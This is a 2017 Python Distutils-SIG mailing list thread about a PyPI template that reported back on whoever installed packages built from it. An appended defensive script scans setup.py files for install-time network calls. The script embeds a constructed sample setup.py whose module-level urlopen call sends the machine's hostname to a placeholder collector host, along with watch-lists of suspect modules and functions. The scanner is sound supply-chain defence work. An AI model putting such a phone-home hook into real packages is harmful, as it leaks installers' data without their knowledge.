This makes me remember https://hackernoon.com/building-a-botnet-on-pypi-be1ad280b8d6 on a related note.
On Thu, Jun 1, 2017 at 7:40 PM, Thomas Kluyver <tho...@kluyver.me.uk> wrote:

> On Thu, Jun 1, 2017, at 06:32 PM, Matt Joyce wrote:
> > It's basically a test dummy package that reports users who have run that
> > package template.
>
> That's what I thought, but all the code to do the upload seems to have
> been removed before s/he built those packages. Now it's just a harmless
> warning, unless I'm missing something.
>
> https://github.com/fate0/cookiecutter-evilpy-package/commit/a3ed1e1e060748b0444158ea3bc569dfbf57645e
>
> > the site referenced lists the package name that the user ran to get posted
> > to the site. there appear to be many packages in pypi that are built off
> > this fatezero template.
>
> There *appear* to be, but I checked several of the names listed there, and
> they're not on PyPI:
>
> https://pypi.python.org/pypi/tkinter
> https://pypi.python.org/pypi/memcached
> https://pypi.python.org/pypi/vtk
> https://pypi.python.org/pypi/python-dev
> https://pypi.python.org/pypi/opencv
>
> So I wonder if the data is fake. Or maybe they were already taken down? Or
> the installations are real, but not using those names.
>
> > PyPI is not a very good package management solution. Most folks I advise
> > to build from PyPI in CI/CD but push to production via a real package
> > management solution such as apt or yum. Always double check sources coming
> > from the internet.
>
> It's an open repository that anyone can upload to. That has its drawbacks
> and its advantages.
_______________________________________________ Distutils-SIG maillist - Distutils-SIG@python.org https://mail.python.org/mailman/listinfo/distutils-sig
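The thread above is about a setup.py template that reported back whoever installed a package built from it. Anything at module level in setup.py runs on every `pip install` from an sdist, so a cheap triage step before installing an untrusted sdist is to parse its setup.py and flag install-time imports of networking or process-spawning modules and calls into them. The scanner below is an added example for this list post; it is not code from the thread, from pip, or from the fate0 template. Both setup.py inputs are constructed for the example (the collector URL is a .invalid placeholder, and nothing is executed, only parsed), and the module and function watch-lists are an illustrative assumption, not an exhaustive catalogue.

```python
"""Static triage of a setup.py for install-time "phone home" behaviour.

Added example, not code from the thread or from the fate0 template.
The source is only parsed with `ast`; it is never executed.
"""
import ast

# Modules worth a second look in a setup.py (assumption: illustrative, not
# exhaustive). `os` is deliberately absent because nearly every benign
# setup.py uses os.path and flagging it would drown the real findings.
SUSPECT_MODULES = {
    "urllib", "urllib2", "http", "httplib", "requests",
    "socket", "subprocess", "ctypes",
}
# Bare function names that indicate an outbound request or code execution,
# for the `from urllib.request import urlopen` style of import.
SUSPECT_FUNCS = {"urlopen", "Popen", "check_output", "system", "exec", "eval"}

# Constructed sample: a benign setup.py that only reads its own README.
BENIGN_SETUP_PY = '''\
import os
from setuptools import setup, find_packages

here = os.path.abspath(os.path.dirname(__file__))
with open(os.path.join(here, "README.md")) as f:
    long_description = f.read()

setup(name="demo-pkg", version="0.1", packages=find_packages(),
      long_description=long_description)
'''

# Constructed sample: install-time telemetry in the style the thread
# describes. The host is a reserved .invalid name; this text is never run.
PHONE_HOME_SETUP_PY = '''\
from setuptools import setup
import platform
import urllib.request

# Reports the installing machine to a collector as soon as setup.py runs,
# i.e. on every `pip install` from sdist, before setup() is even called.
urllib.request.urlopen("https://collector.invalid/report",
                       data=platform.node().encode())

setup(name="demo-pkg", version="0.1")
'''


def _dotted_name(node):
    """Return 'a.b.c' for a Name/Attribute chain, or None for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def scan_setup_py(source):
    """Return sorted (lineno, scope, reason) findings for a setup.py source.

    `scope` records whether the statement sits at module level (and so runs
    unconditionally at install time) or inside a def/class, where it may
    still run via cmdclass hooks but deserves a closer read first.
    """
    tree = ast.parse(source)
    findings = []
    for stmt in tree.body:
        if isinstance(stmt, (ast.FunctionDef, ast.ClassDef)):
            scope = f"inside {stmt.name}"
        else:
            scope = "module level (runs on install)"
        for node in ast.walk(stmt):
            if isinstance(node, ast.Import):
                names = [alias.name for alias in node.names]
            elif isinstance(node, ast.ImportFrom):
                names = [node.module or ""]
            elif isinstance(node, ast.Call):
                name = _dotted_name(node.func)
                if name and (name.split(".")[0] in SUSPECT_MODULES
                             or name.split(".")[-1] in SUSPECT_FUNCS):
                    findings.append((node.lineno, scope, f"calls {name}()"))
                continue
            else:
                continue
            for name in names:
                if name.split(".")[0] in SUSPECT_MODULES:
                    findings.append((node.lineno, scope, f"imports {name}"))
    return sorted(findings)


if __name__ == "__main__":
    for label, src in (("benign", BENIGN_SETUP_PY),
                       ("phone-home", PHONE_HOME_SETUP_PY)):
        print(f"{label}: {scan_setup_py(src) or 'no findings'}")
```

Run against the constructed samples, the benign setup.py yields no findings and the phone-home one flags line 3 (the `urllib.request` import) and line 7 (the `urlopen` call), both at module level. A clean scan is not a clearance: `setup_requires`, `cmdclass` overrides and compiled extensions give an sdist other ways to run code, so treat this as a first filter before reading the file, not a substitute for it.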